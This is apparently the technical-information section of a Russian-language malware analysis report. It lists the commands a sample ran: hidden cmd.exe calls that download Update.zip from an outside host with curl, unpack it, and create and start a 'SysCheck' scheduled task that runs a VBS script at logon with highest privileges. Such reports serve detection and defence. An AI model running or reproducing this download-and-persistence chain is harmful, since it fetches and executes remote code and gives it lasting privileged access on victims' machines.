Техническая информация
- <SYSTEM32>\tasks\syscheck
- '<SYSTEM32>\cmd.exe' /c mkdir %WINDIR%\SystemHealth (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c curl -o %WINDIR%\SystemHealth\Update.zip -L http://micro-economics.net:8080/downloadables/Update.zip (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c tar -xf %WINDIR%\SystemHealth\Update.zip -C %WINDIR%\SystemHealth (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c schtasks /create /tn "SysCheck" /tr "wscript %WINDIR%\SystemHealth\Update\win32check.vbs" /sc onlogon /rl highest /f (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /tn "SysCheck" /tr "wscript %WINDIR%\SystemHealth\Update\win32check.vbs" /sc onlogon /rl highest /f
- '<SYSTEM32>\cmd.exe' /c schtasks /run /tn "SysCheck" (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /run /tn "SysCheck"
- '<SYSTEM32>\taskeng.exe' {9342F497-9FCD-408F-8AC5-C710348F29DE} S-1-5-21-3691498038-2086406363-2140527554-1000:gyphltza\user:Interactive:[1]
- '<SYSTEM32>\wscript.exe' %WINDIR%\SystemHealth\Update\win32check.vbs (со скрытым окном)